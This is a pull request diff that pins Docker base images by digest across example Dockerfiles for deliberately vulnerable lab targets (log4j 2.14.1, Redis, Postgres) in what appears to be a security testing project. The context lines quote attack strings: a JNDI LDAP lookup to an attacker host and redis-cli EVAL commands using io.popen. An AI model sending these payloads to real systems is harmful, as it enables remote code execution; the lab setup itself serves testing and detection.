### PR TITLE
ci: pin Docker base images by digest

### DIFF
--- a/example/chain/backend/Dockerfile
+++ b/example/chain/backend/Dockerfile
@@ -2,7 +2,7 @@
 # vulnerable target — keep the image minimal so any extra binary that
 # appears at runtime (redis-cli, curl, sh) is unambiguously attacker-
 # introduced.
-FROM golang:1.25-alpine AS build
+FROM golang:1.25-alpine@sha256:56961d79ea8129efddcc0b8643fd8a5416b4e6228cfd477e3fd61deb2672c587 AS build
 WORKDIR /src
 COPY go.mod go.sum* ./
 RUN --mount=type=cache,target=/root/.cache/go-build \
@@ -13,7 +13,7 @@ RUN --mount=type=cache,target=/root/.cache/go-build \
     --mount=type=cache,target=/go/pkg/mod \
     CGO_ENABLED=0 go build -trimpath -ldflags="-s -w" -o /out/chain-backend .
 
-FROM gcr.io/distroless/static-debian12:nonroot
+FROM gcr.io/distroless/static-debian12:nonroot@sha256:f5b485ea962d9bd1186b2f6b3a061191539b905b82ec395de78cbfae51f20e35
 COPY --from=build /out/chain-backend /chain-backend
 EXPOSE 8080
 USER nonroot:nonroot

--- a/example/chain/frontend/Dockerfile
+++ b/example/chain/frontend/Dockerfile
@@ -1,7 +1,7 @@
 # Stdlib-only build, distroless runtime. Frontend is the entrypoint —
 # minimal image so any extra binary at runtime is unambiguously attacker-
 # introduced (mirrors chain-backend's posture).
-FROM golang:1.25-alpine AS build
+FROM golang:1.25-alpine@sha256:56961d79ea8129efddcc0b8643fd8a5416b4e6228cfd477e3fd61deb2672c587 AS build
 WORKDIR /src
 COPY go.mod go.sum* ./
 RUN --mount=type=cache,target=/root/.cache/go-build \
@@ -12,7 +12,7 @@ RUN --mount=type=cache,target=/root/.cache/go-build \
     --mount=type=cache,target=/go/pkg/mod \
     CGO_ENABLED=0 go build -trimpath -ldflags="-s -w" -o /out/chain-frontend .
 
-FROM gcr.io/distroless/static-debian12:nonroot
+FROM gcr.io/distroless/static-debian12:nonroot@sha256:f5b485ea962d9bd1186b2f6b3a061191539b905b82ec395de78cbfae51f20e35
 COPY --from=build /out/chain-frontend /chain-frontend
 EXPOSE 8080
 USER nonroot:nonroot

--- a/example/log4j-chain/attacker/Dockerfile
+++ b/example/log4j-chain/attacker/Dockerfile
@@ -4,7 +4,7 @@
 #   ${jndi:ldap://attacker.attacker-ns.svc.cluster.local:1389/Payload}
 # log4j 2.14.1 follows the LDAP referral to the HTTP URL and loads the class.
 
-FROM maven:3.9-eclipse-temurin-11 AS build
+FROM maven:3.9-eclipse-temurin-11@sha256:5818ee89bddd09cc7b265bea1919c5088f82a4e17f0adc104e12e94cb26bea03 AS build
 WORKDIR /src
 # Build marshalsec from upstream.
 RUN apt-get update && apt-get install -y --no-install-recommends git && \
@@ -15,7 +15,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends git && \
 COPY Payload.java /src/Payload.java
 RUN javac -source 1.8 -target 1.8 /src/Payload.java -d /src/classes
 
-FROM eclipse-temurin:11-jdk
+FROM eclipse-temurin:11-jdk@sha256:4d14042fcb8451c643170f8d7f556b817a7aa65800c582ad9190dbc60d424886
 WORKDIR /attacker
 # python3 needed by run.sh to serve Payload.class on :8888 (the eclipse-temurin
 # base image ships with no python). Without this the HTTP server never starts,

--- a/example/log4j-chain/backend/Dockerfile.contained
+++ b/example/log4j-chain/backend/Dockerfile.contained
@@ -2,13 +2,13 @@
 # No /bin/sh, no psql, no curl. JVM-internal RCE only — execve() to anything
 # outside the JVM returns ENOENT. The class loads, runs in-JVM, fails to spawn.
 
-FROM maven:3.9-eclipse-temurin-11 AS build
+FROM maven:3.9-eclipse-temurin-11@sha256:5818ee89bddd09cc7b265bea1919c5088f82a4e17f0adc104e12e94cb26bea03 AS build
 WORKDIR /src
 COPY pom.xml ./
 COPY src ./src
 RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
 
-FROM gcr.io/distroless/java11-debian11
+FROM gcr.io/distroless/java11-debian11@sha256:56ffee16297ae1d3484bd47575cacd8102e5ba2be425a7772b3f8ad0d48def3b
 COPY --from=build /src/target/chain-backend-jar-with-dependencies.jar /app/app.jar
 EXPOSE 8080
 # LDAP endpoint for the /api/_probe trigger. Here the JNDI lookup DOES fire

--- a/example/log4j-chain/backend/Dockerfile.patched
+++ b/example/log4j-chain/backend/Dockerfile.patched
@@ -2,13 +2,13 @@
 # version is bumped. JNDI substring lands in the log message and is rendered
 # as a literal string. No lookup performed, no outbound LDAP.
 
-FROM maven:3.9-eclipse-temurin-11 AS build
+FROM maven:3.9-eclipse-temurin-11@sha256:5818ee89bddd09cc7b265bea1919c5088f82a4e17f0adc104e12e94cb26bea03 AS build
 WORKDIR /src
 COPY pom.xml ./
 COPY src ./src
 RUN LOG4J_VERSION=2.17.1 mvn -B package -DskipTests
 
-FROM eclipse-temurin:11-jdk
+FROM eclipse-temurin:11-jdk@sha256:4d14042fcb8451c643170f8d7f556b817a7aa65800c582ad9190dbc60d424886
 RUN apt-get update && apt-get install -y --no-install-recommends \
     postgresql-client curl dnsutils ca-certificates && \
     rm -rf /var/lib/apt/lists/*

--- a/example/log4j-chain/backend/Dockerfile.vulnerable
+++ b/example/log4j-chain/backend/Dockerfile.vulnerable
@@ -1,13 +1,13 @@
 # Scenario A — vulnerable log4j 2.14.1, ops-friendly ubuntu base.
 # Has /bin/sh, psql, curl, getent — full toolbox for an attacker post-RCE.
 
-FROM maven:3.9-eclipse-temurin-11 AS build
+FROM maven:3.9-eclipse-temurin-11@sha256:5818ee89bddd09cc7b265bea1919c5088f82a4e17f0adc104e12e94cb26bea03 AS build
 WORKDIR /src
 COPY pom.xml ./
 COPY src ./src
 RUN LOG4J_VERSION=2.14.1 mvn -B package -DskipTests
 
-FROM eclipse-temurin:11-jdk
+FROM eclipse-temurin:11-jdk@sha256:4d14042fcb8451c643170f8d7f556b817a7aa65800c582ad9190dbc60d424886
 RUN apt-get update && apt-get install -y --no-install-recommends \
     postgresql-client curl dnsutils ca-certificates && \
     rm -rf /var/lib/apt/lists/*

--- a/example/postgres-vuln/Dockerfile
+++ b/example/postgres-vuln/Dockerfile
@@ -1,4 +1,4 @@
-FROM postgres:16
+FROM postgres:16@sha256:95206741a5b214807675e14165369d05b93a9cf692223b616d07cca227e74b0b
 
 # Install PL extensions needed for CVE attack suite:
 #   plpython3u — T1059 PL/Python RCE

--- a/example/redis/Dockerfile.redis-vulnerable
+++ b/example/redis/Dockerfile.redis-vulnerable
@@ -18,7 +18,7 @@
 #   redis-cli EVAL 'return tostring(io)' 0           → table: 0x...
 #   redis-cli EVAL "return io.popen('id'):read('*a')" 0  → uid=999(redis) ...
 
-FROM debian:bookworm-slim AS builder
+FROM debian:bookworm-slim@sha256:abd67ffcfa541b485a3dff59865ab629aa048a6c613e639d36e7456b0b229241 AS builder
 
 RUN apt-get update && apt-get install -y --no-install-recommends \
     build-essential curl ca-certificates pkg-config \
@@ -97,7 +97,7 @@ RUN /opt/redis/bin/redis-server --version
 # ---------------------------------------------------------------------------
 # Runtime image
 # ---------------------------------------------------------------------------
-FROM debian:bookworm-slim
+FROM debian:bookworm-slim@sha256:abd67ffcfa541b485a3dff59865ab629aa048a6c613e639d36e7456b0b229241
 
 # liblua5.1-0: provides liblua5.1.so.0 — the target for package.loadlib()
 # perl: used by the memfd_create + execve payload (fileless execution)


### PR DESCRIPTION
Pins all 15 `FROM` lines across the 8 example Dockerfiles to their current **multi-arch index** digests (keeping the tag for readability). Index digests, not per-arch, so the multi-platform chain images still build amd64+arm64. Digests match the current tag targets — image content unchanged.

Takes OpenSSF Scorecard **Pinned-Dependencies** from 5 toward ~9–10.

Note: `ci-redis-image` is separately broken by a pre-existing path bug (workflow points at `example/Dockerfile.redis-vulnerable`, file is at `example/redis/…`) — not addressed here.

🤖 Generated with [Claude Code](https://claude.com/claude-code)